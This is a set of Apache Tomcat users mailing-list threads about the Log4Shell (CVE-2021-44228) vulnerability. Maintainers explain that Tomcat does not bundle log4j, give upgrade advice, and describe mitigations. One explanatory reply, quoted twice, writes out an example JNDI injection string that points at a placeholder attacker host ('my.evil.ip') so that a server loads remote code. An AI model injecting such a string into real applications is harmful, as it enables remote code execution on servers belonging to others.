Re: Tomcat 7 - Log4j Vulnerability Guide Request

[Mark Thomas]

Further, Apache Tomcat 7 reached end of life as of 31 March 2021 and is 
no longer supported by this community.


This means we no longer assess Tomcat 7 against reported security 
vulnerabilities so even if your client is running the latest Tomcat 7 
version available, 7.0.109, there have been a number of security 
vulnerabilities reported since that that Tomcat 7 is likely to be 
exposed to.


Your client needs to update to at least the latest 8.5.x release and 
should strongly consider updating to the latest 9.0.x release.


Mark


On 28/01/2022 15:57, Tim Funk wrote:

Out of the box, no version of Apache Tomcat uses any log4j version.

If log4j is used, it is by a specific application (not provided by the ASF)
deployed to Tomcat. (Or an admin changed the default install to add it)

-Tim

On Fri, Jan 28, 2022 at 10:36 AM Samuel Anderson-Burrell | Cloud21
 wrote:


Good Afternoon Apache
Hope your well, my name is Samuel I work for a Security firm Cloud 21 and
we have been working with a client who uses your software in particular
Tomcat.
We are looking to see if there is a security patch against log4j. The
version they are using is tomcat 7, checking your dedicated page for Tomcat
version 7 Apache Tomcat(r) - Apache Tomcat 7 vulnerabilities<
https://tomcat.apache.org/security-7.html#Apache_Tomcat_7.x_vulnerabilities>
there does not appear to be an article to patch against it.
Forgive me if I'm not looking in the correct area if there is one please
could you point me in the right direct. I did try and email your security
mailbox but received an automated message back saying that I needed to be
on the subscribed list which I have attempted to subscribed too but I have
not had a response back yet.






-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Tomcat 7 - Log4j Vulnerability Guide Request

[Eduardo Guadalupe]

I hope this helps
https://lists.apache.org/thread/m3bhytsh3yrhsxvo98vcyx4q6w0m1d4v

On Fri, Jan 28, 2022, 9:58 AM Tim Funk  wrote:

> Out of the box, no version of Apache Tomcat uses any log4j version.
>
> If log4j is used, it is by a specific application (not provided by the ASF)
> deployed to Tomcat. (Or an admin changed the default install to add it)
>
> -Tim
>
> On Fri, Jan 28, 2022 at 10:36 AM Samuel Anderson-Burrell | Cloud21
>  wrote:
>
> > Good Afternoon Apache
> > Hope your well, my name is Samuel I work for a Security firm Cloud 21 and
> > we have been working with a client who uses your software in particular
> > Tomcat.
> > We are looking to see if there is a security patch against log4j. The
> > version they are using is tomcat 7, checking your dedicated page for
> Tomcat
> > version 7 Apache Tomcat(r) - Apache Tomcat 7 vulnerabilities<
> >
> https://tomcat.apache.org/security-7.html#Apache_Tomcat_7.x_vulnerabilities
> >
> > there does not appear to be an article to patch against it.
> > Forgive me if I'm not looking in the correct area if there is one please
> > could you point me in the right direct. I did try and email your security
> > mailbox but received an automated message back saying that I needed to be
> > on the subscribed list which I have attempted to subscribed too but I
> have
> > not had a response back yet.
> >
> >
>

Re: Tomcat 7 - Log4j Vulnerability Guide Request

[Tim Funk]

Out of the box, no version of Apache Tomcat uses any log4j version.

If log4j is used, it is by a specific application (not provided by the ASF)
deployed to Tomcat. (Or an admin changed the default install to add it)

-Tim

On Fri, Jan 28, 2022 at 10:36 AM Samuel Anderson-Burrell | Cloud21
 wrote:

> Good Afternoon Apache
> Hope your well, my name is Samuel I work for a Security firm Cloud 21 and
> we have been working with a client who uses your software in particular
> Tomcat.
> We are looking to see if there is a security patch against log4j. The
> version they are using is tomcat 7, checking your dedicated page for Tomcat
> version 7 Apache Tomcat(r) - Apache Tomcat 7 vulnerabilities<
> https://tomcat.apache.org/security-7.html#Apache_Tomcat_7.x_vulnerabilities>
> there does not appear to be an article to patch against it.
> Forgive me if I'm not looking in the correct area if there is one please
> could you point me in the right direct. I did try and email your security
> mailbox but received an automated message back saying that I needed to be
> on the subscribed list which I have attempted to subscribed too but I have
> not had a response back yet.
>
>

Tomcat 7 - Log4j Vulnerability Guide Request

[Samuel Anderson-Burrell | Cloud21]

Good Afternoon Apache
Hope your well, my name is Samuel I work for a Security firm Cloud 21 and we 
have been working with a client who uses your software in particular Tomcat.
We are looking to see if there is a security patch against log4j. The version 
they are using is tomcat 7, checking your dedicated page for Tomcat version 7 
Apache Tomcat(r) - Apache Tomcat 7 
vulnerabilities<https://tomcat.apache.org/security-7.html#Apache_Tomcat_7.x_vulnerabilities>
 there does not appear to be an article to patch against it.
Forgive me if I'm not looking in the correct area if there is one please could 
you point me in the right direct. I did try and email your security mailbox but 
received an automated message back saying that I needed to be on the subscribed 
list which I have attempted to subscribed too but I have not had a response 
back yet.

Any help would be much appreciated as we have several clients that use Tomcat 
too.

Kind Regards
Samuel Anderson-Burrell | Cloud21


This email, and any attachments transmitted with it, is confidential and 
protected by copyright. If you are not the intended recipient you must not use, 
disseminate, distribute or copy this e-mail or any attachment. If you have 
received this email in error please notify the sender and delete this email, 
and any attachments, completely from your system. This notification is given by 
Cloud21, part of the x-tention group, Suite 01, 40 Churchill Square, West 
Malling, Kent ME19 4YU. Registered in England 06907257.

Re: [OT] Log4j 2.15.0 and Tomcat 9.0.56

[Daniela Morais]

I was a bug in at AbstractClassFinder.java:216
(com.ocpsoft.pretty.faces.config.annotation.AbstractClassFinder.processClass)

Sorry and thanks for your tips!

On Mon, Dec 20, 2021 at 4:53 PM Christopher Schultz
 wrote:
>
> Daniela,
>
> On 12/20/21 13:15, Daniela Morais wrote:
> > I'm trying to upgrade Log4j2 dependencies to 2.15.0 and I'm facing
> > this issue. Is there any workaround or the only option is to upgrade
> > Java?
>
> Note that if you are trying to "upgrade to the latest log4j" due to
> revent CVEs, you want 2.17.0 and not 2.15.0.
>
> -chris
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>


-- 
Daniela Morais
Software Engineer
+55 19 994-868-865 | linkedin
danielammorais.com

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: [OT] Log4j 2.15.0 and Tomcat 9.0.56

[Christopher Schultz]

Daniela,

On 12/20/21 13:15, Daniela Morais wrote:

I'm trying to upgrade Log4j2 dependencies to 2.15.0 and I'm facing
this issue. Is there any workaround or the only option is to upgrade
Java?


Note that if you are trying to "upgrade to the latest log4j" due to 
revent CVEs, you want 2.17.0 and not 2.15.0.


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Log4j 2.15.0 and Tomcat 9.0.56

[Johan Compagner]

that is a class that is being loaded on java 8 and it wants java 9
but log4j as far as i know supports even java 7.. so i have a feeling that
can't be it (that it won't run on java 8)

On Mon, 20 Dec 2021 at 19:15, Daniela Morais  wrote:

> I'm trying to upgrade Log4j2 dependencies to 2.15.0 and I'm facing
> this issue. Is there any workaround or the only option is to upgrade
> Java?
>
> Configs
> Java 8
> Tomcat 9.0.56
>
> Log
> 20-Dec-2021 15:10:45.177 SEVERE [RMI TCP Connection(2)-127.0.0.1]
> org.apache.catalina.core.StandardContext.listenerStart Exception
> sending context initialized event to listener instance of class
> [org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener]
> java.lang.UnsupportedClassVersionError:
> META-INF/versions/9/module-info has been compiled by a more recent
> version of the Java Runtime (class file version 53.0), this version of
> the Java Runtime only recognizes class file versions up to 52.0
> (unable to load class [META-INF.versions.9.module-info])
> at
> org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2483)
> at
> org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:870)
> at
> org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1371)
> at
> org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)
> at
> com.ocpsoft.pretty.faces.config.annotation.AbstractClassFinder.processClass(AbstractClassFinder.java:216)
> at
> com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.processJarFile(WebLibFinder.java:141)
> at
> com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.findClasses(WebLibFinder.java:85)
> at
> com.ocpsoft.pretty.faces.config.spi.AnnotationConfigurationProvider.loadConfiguration(AnnotationConfigurationProvider.java:82)
> at
> com.ocpsoft.pretty.faces.config.PrettyConfigurator.configure(PrettyConfigurator.java:63)
> at
> org.ocpsoft.rewrite.prettyfaces.PrettyConfigContextListener.contextInitialized(PrettyConfigContextListener.java:41)
> at
> org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener.contextInitialized(RewriteServletContextListener.java:38)
> at
> org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4768)
> at
> org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5230)
> at
> org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
> at
> org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:726)
> at
> org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:698)
> at
> org.apache.catalina.core.StandardHost.addChild(StandardHost.java:696)
> at
> org.apache.catalina.startup.HostConfig.manageApp(HostConfig.java:1783)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
> at
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
> at java.lang.reflect.Method.invoke(Method.java:498)
> at
> org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
> at
> com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
> at
> com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
> at
> org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:460)
> at
> org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:408)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
> at
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
> at java.lang.reflect.Method.invoke(Method.java:498)
> at
> org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
> at
> com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
> at
> com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
> at
> com.sun.jmx.remote.security.MBeanServerAccessController.invoke(MBeanServerAccessController.java:468)
> at
> javax.management.remote.rmi.RMIConnectionImpl.doOperation(RMIConnectionImpl.java:1468)
> at
> javax.management.remote.rmi.RMIConnectionImpl.access$300(RMIConnectionImpl.java:76)
> at
> javax.manag

Re: Log4j 2.15.0 and Tomcat 9.0.56

[Sebastian Hennebrüder]

We are running Tomcat 9 on Java 11 without any issues, but you probably want to 
test it with your application.

> Am 20.12.2021 um 19:15 schrieb Daniela Morais :
> 
> I'm trying to upgrade Log4j2 dependencies to 2.15.0 and I'm facing
> this issue. Is there any workaround or the only option is to upgrade
> Java?
> 
> Configs
> Java 8
> Tomcat 9.0.56
> 
> Log
> 20-Dec-2021 15:10:45.177 SEVERE [RMI TCP Connection(2)-127.0.0.1]
> org.apache.catalina.core.StandardContext.listenerStart Exception
> sending context initialized event to listener instance of class
> [org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener]
>java.lang.UnsupportedClassVersionError:
> META-INF/versions/9/module-info has been compiled by a more recent
> version of the Java Runtime (class file version 53.0), this version of
> the Java Runtime only recognizes class file versions up to 52.0
> (unable to load class [META-INF.versions.9.module-info])
>at 
> org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2483)
>at 
> org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:870)
>at 
> org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1371)
>at 
> org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)
>at 
> com.ocpsoft.pretty.faces.config.annotation.AbstractClassFinder.processClass(AbstractClassFinder.java:216)
>at 
> com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.processJarFile(WebLibFinder.java:141)
>at 
> com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.findClasses(WebLibFinder.java:85)
>at 
> com.ocpsoft.pretty.faces.config.spi.AnnotationConfigurationProvider.loadConfiguration(AnnotationConfigurationProvider.java:82)
>at 
> com.ocpsoft.pretty.faces.config.PrettyConfigurator.configure(PrettyConfigurator.java:63)
>at 
> org.ocpsoft.rewrite.prettyfaces.PrettyConfigContextListener.contextInitialized(PrettyConfigContextListener.java:41)
>at 
> org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener.contextInitialized(RewriteServletContextListener.java:38)
>at 
> org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4768)
>at 
> org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5230)
>at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
>at 
> org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:726)
>at 
> org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:698)
>at 
> org.apache.catalina.core.StandardHost.addChild(StandardHost.java:696)
>at 
> org.apache.catalina.startup.HostConfig.manageApp(HostConfig.java:1783)
>at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
>at 
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>at 
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>at java.lang.reflect.Method.invoke(Method.java:498)
>at 
> org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
>at 
> com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
>at 
> com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
>at 
> org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:460)
>at 
> org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:408)
>at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
>at 
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>at 
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>at java.lang.reflect.Method.invoke(Method.java:498)
>at 
> org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
>at 
> com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
>at 
> com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
>at 
> com.sun.jmx.remote.security.MBeanServerAccessController.invoke(MBeanServerAccessController.java:468)
>at 
> javax.management.remote.rmi.RMIConnectionImpl.doOperation(RMIConnectionImpl.java:1468)
>at 
> javax.management.remote.rmi.RMIConnectionImpl.access$300(RMIConnectionImpl.java:76)
>at 
> javax.management.remote.rmi.RMIConnectionImpl$PrivilegedOperation.run(RMIConnectionImpl.java:1309)
>at java.security.AccessController.doPrivileged(Native Method)
>at 
> javax.management.remote.rmi.RMIConnectionImpl.doPrivilegedOperation(RMIConnectionImpl.java:1408)
>at 
> 

Log4j 2.15.0 and Tomcat 9.0.56

[Daniela Morais]

I'm trying to upgrade Log4j2 dependencies to 2.15.0 and I'm facing
this issue. Is there any workaround or the only option is to upgrade
Java?

Configs
Java 8
Tomcat 9.0.56

Log
20-Dec-2021 15:10:45.177 SEVERE [RMI TCP Connection(2)-127.0.0.1]
org.apache.catalina.core.StandardContext.listenerStart Exception
sending context initialized event to listener instance of class
[org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener]
java.lang.UnsupportedClassVersionError:
META-INF/versions/9/module-info has been compiled by a more recent
version of the Java Runtime (class file version 53.0), this version of
the Java Runtime only recognizes class file versions up to 52.0
(unable to load class [META-INF.versions.9.module-info])
at 
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2483)
at 
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:870)
at 
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1371)
at 
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)
at 
com.ocpsoft.pretty.faces.config.annotation.AbstractClassFinder.processClass(AbstractClassFinder.java:216)
at 
com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.processJarFile(WebLibFinder.java:141)
at 
com.ocpsoft.pretty.faces.config.annotation.WebLibFinder.findClasses(WebLibFinder.java:85)
at 
com.ocpsoft.pretty.faces.config.spi.AnnotationConfigurationProvider.loadConfiguration(AnnotationConfigurationProvider.java:82)
at 
com.ocpsoft.pretty.faces.config.PrettyConfigurator.configure(PrettyConfigurator.java:63)
at 
org.ocpsoft.rewrite.prettyfaces.PrettyConfigContextListener.contextInitialized(PrettyConfigContextListener.java:41)
at 
org.ocpsoft.rewrite.servlet.impl.RewriteServletContextListener.contextInitialized(RewriteServletContextListener.java:38)
at 
org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4768)
at 
org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5230)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at 
org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:726)
at 
org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:698)
at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:696)
at 
org.apache.catalina.startup.HostConfig.manageApp(HostConfig.java:1783)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
at 
com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
at 
com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
at 
org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:460)
at 
org.apache.catalina.mbeans.MBeanFactory.createStandardContext(MBeanFactory.java:408)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
org.apache.tomcat.util.modeler.BaseModelMBean.invoke(BaseModelMBean.java:293)
at 
com.sun.jmx.interceptor.DefaultMBeanServerInterceptor.invoke(DefaultMBeanServerInterceptor.java:819)
at 
com.sun.jmx.mbeanserver.JmxMBeanServer.invoke(JmxMBeanServer.java:801)
at 
com.sun.jmx.remote.security.MBeanServerAccessController.invoke(MBeanServerAccessController.java:468)
at 
javax.management.remote.rmi.RMIConnectionImpl.doOperation(RMIConnectionImpl.java:1468)
at 
javax.management.remote.rmi.RMIConnectionImpl.access$300(RMIConnectionImpl.java:76)
at 
javax.management.remote.rmi.RMIConnectionImpl$PrivilegedOperation.run(RMIConnectionImpl.java:1309)
at java.security.AccessController.doPrivileged(Native Method)
at 
javax.management.remote.rmi.RMIConnectionImpl.doPrivilegedOperation(RMIConnectionImpl.java:1408)
at 
javax.management.remote.rmi.RMIConnectionImpl.invoke(RMIConnectionImpl.java:829)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at 

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Niranjan Rao]

This is one of the best explanation I've seen. And it does not use the 
word Minecraft to emphasis the importance.


Thank you.

Niranjan
On 12/13/21 3:36 PM, Christopher Schultz wrote:

James,

On 12/13/21 14:48, James H. H. Lampert wrote:

On 12/13/21 10:53 AM, Mark Thomas wrote:

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any 
more format strings. This means the output of one format string can 
insert a new format string.

. . .

Thanks. It's starting to make sense to me now, even given that much 
of it involves Java functionality I'd never heard of.


After re-reading the Veracode article in light of what you said, I 
then found a couple of Wikipedia articles that further clarify 
things, for me at least:


https://en.wikipedia.org/wiki/Log4j
https://en.wikipedia.org/wiki/Log4Shell

So it's the ability to resolve stuff of the general format 
"${prefix:name}" within a log string, that's the problem.


It's starting to reach a point where I can wrap my 59-year-old little 
grey cells around it.


As much fun as it is to talk about this stuff, "we" (ASF volunteers, 
as well as many others) tend to try not to provide examples of how to 
exploit vulnerabilities. In this case, all you have to do it search 
GitHub for this CVE or "log4shell" on GitHub and you can see lots of 
examples.


In this case, the cat is out of the bag. I'm still not going to 
provide specific examples, but I can help you understand, conceptually.


The link Mark provided in a separate response has some of the dirty 
details. Without talking at that level of detail, the worst attack 
works essentially like this:


1. Attacker hosts an RMI server, which is a thing that allows Java 
(client) applications to remotely-load .class files from other places. 
This is great in an "enterprise" environment because a service can 
tell a client "here is the thing you need to work with me" instead of 
saying "well, if you don't have foo-bar-1.4.5.jar loaded then you can 
piss off." It's handy... and seriously dangerous if you aren't careful.


Any evildoer can do this whenever they want, there is nothing stopping 
them, nor is it really that damaging to the world in general. Just 
like I can brew poison in my own bathtub, if nobody is drinking from 
my bathtub (ew?), it's not likely to cause too much sickness or death.


2. A vulnerability is discovered and reported in log4j. This allows 
log *messages* to contain JNDI lookups. This includes 
attacker-controlled things like e.g.:


  log.info("FYI User " + username + " just searched for search string 
" + queryString);


Pretty innocuous, right? Well, if the search string looks like 
${jndi:[stuff]} then ... boom.


3. JNDI lookups allow you to request that information be pulled-in 
from an LDAP server. JNDI across the network is essentially the same 
thing as LDAP (or "Active Directory" if that's what you use... AD is 
LDAP). One of the things you can tell your JNDI lookup to do is load a 
.class file over the network and use it for $stuff.


4. Remember that evil RMI server we set up in #1 above? Well, unless 
you are filtering-out LDAP connections to random IPs (and, really, you 
*should be*), then I as an attacking user can just go to your 
application and search for


  "Hey buddy lol ${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject};

At this point, log4j will consider this string to log:

FYI User chris just searched for the search string Hey buddy lol 
${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject}


Oh, look, there's a magic "${jndi:" thing in there. Let's helpfully 
resolve that...


The JNDI lookup causes your server to reach-out to my.evil.ip, pull a 
reference for that class across the wire, then pull the class 
definition across the wire, and run the evil class code on your server.


At this point, the resulting string written to the log does make a bit 
of difference. The evil code has been loaded onto your server and you 
have a Bad Day.


Now, this can be mitigated in a number of ways, which is nice. My two 
favorite (and incomplete) ways to mitigate this are:


1. Don't allow outgoing LDAP connections from your server. In fact, it 
doesn't matter if they are LDAP or not. Don't allow outgoing 
connections from your servers except the required[1] ones.


2. Recent Java versions automatically disable remote-classloading via 
LDAP to prevent this kind of monkey business. But there are ways to 
make it work anyway.


This is why we can't have nice things.

RCE is bad m'kay, but let's say that you don't allow outgoing network 
connections AT ALL from your server, so you are TOTALLY IMMUNE from 
this kind of attack. Well, RCE ain't the only thing possible.


Data exfiltration is an often-overlooked attack that can still be 
pretty bad. It's "limited" to what can be fo

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Christopher Schultz]

James,

On 12/13/21 19:24, James H. H. Lampert wrote:
I can *barely* wrap my mind around the idea of getting executable code 
from an RMI server, but what legitimate purpose could be served by 
allowing a *logger* to resolve executable code?


None. The designers of log4j probably were thinking "hey, users might 
want to log their configuration(s) to the log file at some point, so 
maybe we can do them a favor and make it really easy to do that using 
${jndi:} directly in the log message." Never, of course, thinking about 
the fact that JNDI lookups can be *far* more ... interesting than just 
grabbing a string value from memory and tossing it into a log message.


This vulnerability comes from two sources:

1. An incredibly powerful and complex infrastructure in JNDI

+

2. An incredibly simply way to access it (via log4j)

At the time, nobody was thinking critically about security because "it's 
just logging stuff."


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Tim Funk]

LOG4J2 allows for multiple keyword types of keyword expansions in the logs.
Keyword expansion is a "great way" to log items possibly only known at run
time. And with trace, debug level logging - Comparing those expanded values
to logged values makes debugging "easier". (The closest you'll get to
breakpoints in production)

The downside (exploit) is when the expansion (lookup) does things a little
too powerfully. Then other folks come along and use that to *chain* other
exploits. Remote LDAP calls were not in mind when the original idea was
presenting a value from "java:comp/env". That's gap #1. Then gap #2 was the
ability for jndi calls via LDAP to allow serialized results to come back.
And the deserialization allowed for arbitrary code execution. WIth a modern
java, the (trivial) de-serialization exploit won't happen. But there are
many other chaining opportunities still out there.

A key takeaway is you might judge individual single exploits not to be bad.
But if you can easily chain multiple ones together, then the black hat
party can begin.

-Tim


On Mon, Dec 13, 2021 at 7:24 PM James H. H. Lampert
 wrote:

>
> I can *barely* wrap my mind around the idea of getting executable code
> from an RMI server, but what legitimate purpose could be served by
> allowing a *logger* to resolve executable code?
>
>

[SECURITY] Apache Tomcat and CVE-2021-44228 (Log4j vulnerability)

[Mark Thomas]

The following represents the current understanding of the Apache Tomcat 
security team at the time this announcement was issued. There is a lot 
of security research being focussed on log4j2 at the moment and it is 
probable that additional information will emerge.


Currently supported Tomcat versions (8.5.x, 9.0.x, 10.0.x and 10.1.x) 
have no dependency on any version of log4j.


Web applications deployed on Tomcat may have a dependency on log4j. You 
should seek support from your application vendors on how best to address 
this vulnerability.


Tomcat 8.0.x and earlier as well as the first few releases of 8.5.x 
(8.5.3 and earlier) provided optional support for switching Tomcat's 
internal logging to log4j 1.x. Anyone one using these very old (5+ 
years), unsupported versions of Tomcat that switched to using log4j 1.x 
may need to address this vulnerability as log4j 1.x may be affected in 
some (probably rarely used) configurations. Regardless, they'll need to 
address the Tomcat vulnerabilities that have been made public in those 
5+ years.


It is possible to configure Tomcat to use log4j 2.x for Tomcat's 
internal logging. This requires explicit configuration and the addition 
of the log4j 2.x library. Anyone who has switched Tomcat's internal 
logging to log4j 2.x is likely to need to address this vulnerability.


In most cases, disabling the problematic feature will be the simplest 
solution. Exactly how to do that depends on the exact version of log4j2 
being used. Details are provided on the log4j2 security page [1].


If not already subscribed, you may wish to follow the ASF announcements 
mailing list [2] where any significant updates from the logging project 
will be posted.


If you have any questions regarding this issue or how to mitigate it, 
please direct them to the Apache Tomcat Users mailing list [3].


The Apache Tomcat Security Team


[1] https://logging.apache.org/log4j/2.x/security.html

[2] https://www.apache.org/foundation/mailinglists.html#foundation-announce

[3] https://tomcat.apache.org/lists.html#tomcat-users

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[James H. H. Lampert]

Thanks. I think I understand now.

All except for one thing:

I can *barely* wrap my mind around the idea of getting executable code 
from an RMI server, but what legitimate purpose could be served by 
allowing a *logger* to resolve executable code?


--
JHHL
(And I have a fair amount of experience writing "solutions looking for a 
problem" that "seemed like a good idea at the time," but turned out to 
have no practical use. More experience than I'd like to have, in fact.)


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Christopher Schultz]

James,

On 12/13/21 14:48, James H. H. Lampert wrote:

On 12/13/21 10:53 AM, Mark Thomas wrote:

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any 
more format strings. This means the output of one format string can 
insert a new format string.

. . .

Thanks. It's starting to make sense to me now, even given that much of 
it involves Java functionality I'd never heard of.


After re-reading the Veracode article in light of what you said, I then 
found a couple of Wikipedia articles that further clarify things, for me 
at least:


https://en.wikipedia.org/wiki/Log4j
https://en.wikipedia.org/wiki/Log4Shell

So it's the ability to resolve stuff of the general format 
"${prefix:name}" within a log string, that's the problem.


It's starting to reach a point where I can wrap my 59-year-old little 
grey cells around it.


As much fun as it is to talk about this stuff, "we" (ASF volunteers, as 
well as many others) tend to try not to provide examples of how to 
exploit vulnerabilities. In this case, all you have to do it search 
GitHub for this CVE or "log4shell" on GitHub and you can see lots of 
examples.


In this case, the cat is out of the bag. I'm still not going to provide 
specific examples, but I can help you understand, conceptually.


The link Mark provided in a separate response has some of the dirty 
details. Without talking at that level of detail, the worst attack works 
essentially like this:


1. Attacker hosts an RMI server, which is a thing that allows Java 
(client) applications to remotely-load .class files from other places. 
This is great in an "enterprise" environment because a service can tell 
a client "here is the thing you need to work with me" instead of saying 
"well, if you don't have foo-bar-1.4.5.jar loaded then you can piss 
off." It's handy... and seriously dangerous if you aren't careful.


Any evildoer can do this whenever they want, there is nothing stopping 
them, nor is it really that damaging to the world in general. Just like 
I can brew poison in my own bathtub, if nobody is drinking from my 
bathtub (ew?), it's not likely to cause too much sickness or death.


2. A vulnerability is discovered and reported in log4j. This allows log 
*messages* to contain JNDI lookups. This includes attacker-controlled 
things like e.g.:


  log.info("FYI User " + username + " just searched for search string " 
+ queryString);


Pretty innocuous, right? Well, if the search string looks like 
${jndi:[stuff]} then ... boom.


3. JNDI lookups allow you to request that information be pulled-in from 
